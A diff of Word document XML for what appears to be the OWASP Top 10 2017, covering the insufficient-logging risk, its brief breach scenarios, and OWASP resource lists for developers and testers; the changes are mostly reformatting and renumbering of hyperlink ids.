-          <w:t>OWASP Dependency Check (for Java and .NET libraries)</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="52"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId151">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11006,12 +10995,35 @@
           <w:numId w:val="53"/>
         </w:numPr>
       </w:pPr>
+      <w:hyperlink r:id="rId151">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>The Unfortunate Reality of Insecure Libraries</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="53"/>
+        </w:numPr>
+      </w:pPr>
       <w:hyperlink r:id="rId152">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>The Unfortunate Reality of Insecure Libraries</w:t>
+          <w:t>MITRE Common Vulnerabilitie</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>s and Exposures (CVE) search</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11028,13 +11040,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>MITRE Common Vulnerabilitie</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>s and Exposures (CVE) search</w:t>
+          <w:t>National Vulnerability Database (NVD)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11051,7 +11057,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>National Vulnerability Database (NVD)</w:t>
+          <w:t>Retire.js for detecting known vulnerable JavaScript libraries</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11068,7 +11074,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Retire.js for detecting known vulnerable JavaScript libraries</w:t>
+          <w:t>Node Libraries Security Advisories</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11085,7 +11091,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Node Libraries Security Advisories</w:t>
+          <w:t>Ruby Libraries Security Advisory Database and Tools</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11102,23 +11108,6 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>Ruby Libraries Security Advisory Database and Tools</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="53"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId158">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
           <w:t>Snyk: Node/JS, Ruby, Java and Python Vulnerability Database and</w:t>
         </w:r>
         <w:r>
@@ -11134,7 +11123,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="102" w:name="a102017-insufficient-logging-detection-a"/>
-      <w:bookmarkStart w:id="103" w:name="_Toc496719114"/>
+      <w:bookmarkStart w:id="103" w:name="_Toc496914307"/>
       <w:bookmarkEnd w:id="102"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11148,9 +11137,9 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="3102"/>
-        <w:gridCol w:w="3750"/>
-        <w:gridCol w:w="2508"/>
+        <w:gridCol w:w="3171"/>
+        <w:gridCol w:w="3848"/>
+        <w:gridCol w:w="2557"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -11271,7 +11260,7 @@
             <w:r>
               <w:t xml:space="preserve">This issue is included in the Top 10 based on an </w:t>
             </w:r>
-            <w:hyperlink r:id="rId159">
+            <w:hyperlink r:id="rId158">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -11403,7 +11392,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure all login, access control failures, input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
+        <w:t>Ensure all login, access control failures, inpu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11415,10 +11407,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure high value transactions ha</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ve an audit trail with integrity controls to prevent tampering or deletion, such as append only database tables or similar.</w:t>
+        <w:t>Ensure high value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append only database tables or similar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11430,10 +11419,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Establish effective monitoring and alerting such that suspicious activities are detected and responded within acceptable time period</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s.</w:t>
+        <w:t>Establish effective monitoring and alerting such that suspicious activities are detected and respon</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ded within acceptable time periods.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11447,66 +11436,63 @@
       <w:r>
         <w:t>Establish or adopt an incident response and recovery plan, such as </w:t>
       </w:r>
+      <w:hyperlink r:id="rId159">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>NIST 800-61 rev 2</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t> or later.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>There are commercial and open source appli</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cation protection frameworks such as </w:t>
+      </w:r>
       <w:hyperlink r:id="rId160">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>NIST 800-61 rev 2</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t> or later.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>There are commercial and open source application protection frameworks such</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> as </w:t>
+          <w:t>OWASP AppSensor</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, web application firewalls such as </w:t>
       </w:r>
       <w:hyperlink r:id="rId161">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP AppSensor</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, web application firewalls such as </w:t>
+          <w:t>mod_security with the OWASP Core Rule Set</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>, and log correlation software such as </w:t>
       </w:r>
       <w:hyperlink r:id="rId162">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>mod_security with the OWAS</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>P Core Rule Set</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>, and log correlation software such as </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId163">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
           <w:t>ELK</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t> with custom dashboards and alerting. Penetration testing and scans by DAST tools (such as OWASP ZAP) should always trigger alerts.</w:t>
+        <w:t> with custom dashboards and alerting. Penetration testing and scans by DAST tools (such as OWASP ZAP) should always</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> trigger alerts.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11517,10 +11503,7 @@
       <w:bookmarkEnd w:id="106"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Example Attack S</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cenarios</w:t>
+        <w:t>Example Attack Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11534,10 +11517,10 @@
         <w:t>Scenario 1</w:t>
       </w:r>
       <w:r>
-        <w:t>: An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Althou</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gh source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
+        <w:t xml:space="preserve">: An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11551,10 +11534,10 @@
         <w:t>Scenario 2</w:t>
       </w:r>
       <w:r>
-        <w:t>: An attacker uses scans for users using a common password. He can take</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</w:t>
+        <w:t>: An attacker uses scans for users usi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ng a common password. He can take over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11568,13 +11551,13 @@
         <w:t>Scenario 3</w:t>
       </w:r>
       <w:r>
-        <w:t>: A major US retailer reportedly had an internal malware analysis sandbox anal</w:t>
-      </w:r>
-      <w:r>
-        <w:t>yzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an exter</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nal bank.</w:t>
+        <w:t>: A major US retailer reportedly had an inter</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudul</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ent card transactions by an external bank.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11605,7 +11588,7 @@
           <w:numId w:val="56"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId164" w:anchor="8:_Implement_Logging_and_Intrusion_Detection">
+      <w:hyperlink r:id="rId163" w:anchor="8:_Implement_Logging_and_Intrusion_Detection">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11622,12 +11605,29 @@
           <w:numId w:val="56"/>
         </w:numPr>
       </w:pPr>
+      <w:hyperlink r:id="rId164" w:anchor="tab=Home">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Application Security Verification Standard - V8 Logging and Monitoring</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="56"/>
+        </w:numPr>
+      </w:pPr>
       <w:hyperlink r:id="rId165" w:anchor="tab=Home">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Application Security Verification Standard - V8 Logging and Monitoring</w:t>
+          <w:t>OWASP Testing Guide - Testing for Detailed Error Code</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -11639,24 +11639,7 @@
           <w:numId w:val="56"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId166" w:anchor="tab=Home">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Testing Guide - Testing for Detailed Error Code</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="56"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId167">
+      <w:hyperlink r:id="rId166">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11683,28 +11666,28 @@
           <w:numId w:val="57"/>
         </w:numPr>
       </w:pPr>
+      <w:hyperlink r:id="rId167">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>CWE-223 Omission of Security-relevant Information</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
+      </w:pPr>
       <w:hyperlink r:id="rId168">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-223 Omission of Security-relevant Information</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="57"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId169">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
           <w:t>CWE-778 Insufficient Logging</w:t>
         </w:r>
       </w:hyperlink>
@@ -11714,7 +11697,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="110" w:name="d-whats-next-for-developers"/>
-      <w:bookmarkStart w:id="111" w:name="_Toc496719115"/>
+      <w:bookmarkStart w:id="111" w:name="_Toc496914308"/>
       <w:bookmarkEnd w:id="110"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11729,10 +11712,10 @@
       <w:bookmarkStart w:id="112" w:name="establish-use-repeatable-security-proces"/>
       <w:bookmarkEnd w:id="112"/>
       <w:r>
-        <w:t>Establish &amp; Use Repeatable</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Security Processes and Standard Security Controls</w:t>
+        <w:t>Establish &amp; Use Repeatabl</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e Security Processes and Standard Security Controls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11740,10 +11723,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to mana</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ge a large application portfolio, this task can be daunting.</w:t>
+        <w:t>Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to man</w:t>
+      </w:r>
+      <w:r>
+        <w:t>age a large application portfolio, this task can be daunting.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11751,13 +11734,13 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address applicatio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verify</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ing the security of their applications and APIs.</w:t>
+        <w:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address applicati</w:t>
+      </w:r>
+      <w:r>
+        <w:t>on security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verif</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ying the security of their applications and APIs.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11766,8 +11749,8 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1771"/>
-        <w:gridCol w:w="7589"/>
+        <w:gridCol w:w="1783"/>
+        <w:gridCol w:w="7793"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -11830,7 +11813,7 @@
             <w:r>
               <w:t xml:space="preserve">To produce a secure web application, you must define what secure means for that application. OWASP recommends you use the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId170">
+            <w:hyperlink r:id="rId169">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -11841,7 +11824,7 @@
             <w:r>
               <w:t xml:space="preserve">, as a guide for setting the security requirements for your application(s). If you're outsourcing, consider the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId171">
+            <w:hyperlink r:id="rId170">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -11889,24 +11872,18 @@
             <w:r>
               <w:t xml:space="preserve">Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start. OWASP recommends the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId172">
+            <w:hyperlink r:id="rId171">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Prevention Che</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                </w:rPr>
-                <w:t>at Sheets</w:t>
+                <w:t>OWASP Prevention Cheat Sheets</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
               <w:t xml:space="preserve"> and the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId173">
+            <w:hyperlink r:id="rId172">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -11930,7 +11907,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Security Standard Controls</w:t>
+              <w:t>Security Standard Cont</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rols</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11943,10 +11923,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Building strong and usable se</w:t>
-            </w:r>
-            <w:r>
-              <w:t>curity controls is difficult. Using a set of standard security controls radically simplifies the development of secure applications and APIs. Many popular frameworks come with standard security controls for authorization, validation, CSRF, etc.</w:t>
+              <w:t xml:space="preserve">Building strong and usable security controls is difficult. Using a set of standard security controls radically simplifies the development of secure applications and APIs. Many popular frameworks come with standard security controls for authorization, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>validation, CSRF, etc.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11961,10 +11941,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Secure Dev</w:t>
-            </w:r>
-            <w:r>
-              <w:t>elopment Lifecycle</w:t>
+              <w:t>Secure Development Lifecycle</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11979,19 +11956,22 @@
             <w:r>
               <w:t xml:space="preserve">To improve the process your organization follows when building applications and APIs, OWASP recommends the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId174">
+            <w:hyperlink r:id="rId173">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Software Assurance Maturity Model (SAMM)</w:t>
+                <w:t>OWASP Software Assurance M</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>aturity Model (SAMM)</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t>. This model h</w:t>
-            </w:r>
-            <w:r>
-              <w:t>elps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</w:t>
+              <w:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12021,7 +12001,7 @@
             <w:r>
               <w:t xml:space="preserve">The </w:t>
             </w:r>
-            <w:hyperlink r:id="rId175">
+            <w:hyperlink r:id="rId174">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12032,7 +12012,7 @@
             <w:r>
               <w:t xml:space="preserve"> provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try </w:t>
             </w:r>
-            <w:hyperlink r:id="rId176">
+            <w:hyperlink r:id="rId175">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12043,7 +12023,7 @@
             <w:r>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
-            <w:hyperlink r:id="rId177">
+            <w:hyperlink r:id="rId176">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12054,7 +12034,7 @@
             <w:r>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
-            <w:hyperlink r:id="rId178">
+            <w:hyperlink r:id="rId177">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12065,24 +12045,18 @@
             <w:r>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
-            <w:hyperlink r:id="rId179">
+            <w:hyperlink r:id="rId178">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>OWASP Juice</w:t>
-              </w:r>
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink"/>
-                </w:rPr>
-                <w:t xml:space="preserve"> Shop Project</w:t>
+                <w:t>OWASP Juice Shop Project</w:t>
               </w:r>
             </w:hyperlink>
             <w:r>
               <w:t xml:space="preserve"> or the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId180">
+            <w:hyperlink r:id="rId179">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12093,7 +12067,7 @@
             <w:r>
               <w:t xml:space="preserve">. To stay current, come to an </w:t>
             </w:r>
-            <w:hyperlink r:id="rId181">
+            <w:hyperlink r:id="rId180">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12104,7 +12078,7 @@
             <w:r>
               <w:t xml:space="preserve">, </w:t>
             </w:r>
-            <w:hyperlink r:id="rId182">
+            <w:hyperlink r:id="rId181">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12115,7 +12089,7 @@
             <w:r>
               <w:t xml:space="preserve">, or local </w:t>
             </w:r>
-            <w:hyperlink r:id="rId183">
+            <w:hyperlink r:id="rId182">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12137,36 +12111,36 @@
       <w:r>
         <w:t xml:space="preserve">There are numerous additional OWASP resources available for your use. Please visit the </w:t>
       </w:r>
+      <w:hyperlink r:id="rId183">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Projects</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> page, which lists all the Flagship, Labs, and Incubator pr</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ojects in the OWASP project inventory. Most OWASP resources are available on our </w:t>
+      </w:r>
       <w:hyperlink r:id="rId184">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Projects</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> page, which lists all the Flagship, Labs, and Incubator projects in the OWASP project invent</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ory. Most OWASP resources are available on our </w:t>
+          <w:t>wiki</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">, and many OWASP documents can be ordered in </w:t>
       </w:r>
       <w:hyperlink r:id="rId185">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>wiki</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, and many OWASP documents can be ordered in </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId186">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
           <w:t>hardcopy or as eBooks</w:t>
         </w:r>
       </w:hyperlink>
@@ -12179,7 +12153,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="113" w:name="t-whats-next-for-security-testing"/>
-      <w:bookmarkStart w:id="114" w:name="_Toc496719116"/>
+      <w:bookmarkStart w:id="114" w:name="_Toc496914309"/>
       <w:bookmarkEnd w:id="113"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -12202,13 +12176,13 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Building code securely is important. But it's critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of ap</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">plication security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put </w:t>
-      </w:r>
-      <w:r>
-        <w:t>some thought into how you are going to focus on what's important across your entire application portfolio, and do it cost-effectively.</w:t>
+        <w:t>Building code securely is important. But it's critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>So we strongly encourage you to put some thought into how you are going to focus on what's important across your entire application portfolio, and do it cost-effectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12216,13 +12190,13 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every y</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ear or so are long gone. Modern software development requires continuous application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn't slow development. W</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</w:t>
+        <w:t>Modern risks move quickly, so the days of scanning or penetration testing an applicat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ion for vulnerabilities once every year or so are long gone. Modern software development requires continuous application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ion that doesn't slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12231,8 +12205,8 @@
         <w:tblLook w:val="07E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1550"/>
-        <w:gridCol w:w="7810"/>
+        <w:gridCol w:w="1561"/>
+        <w:gridCol w:w="8015"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -12295,7 +12269,7 @@
             <w:r>
               <w:t xml:space="preserve">Before you start testing, be sure you understand what's important to spend time on. Priorities come from the threat model, so if you don't have one, you need to create one before testing. Consider using </w:t>
             </w:r>
-            <w:hyperlink r:id="rId187">
+            <w:hyperlink r:id="rId186">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12306,7 +12280,7 @@
             <w:r>
               <w:t xml:space="preserve"> and the </w:t>
             </w:r>
-            <w:hyperlink r:id="rId188">
+            <w:hyperlink r:id="rId187">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -12343,13 +12317,13 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Your approach to application s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ecurity testing must be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look</w:t>
-            </w:r>
-            <w:r>
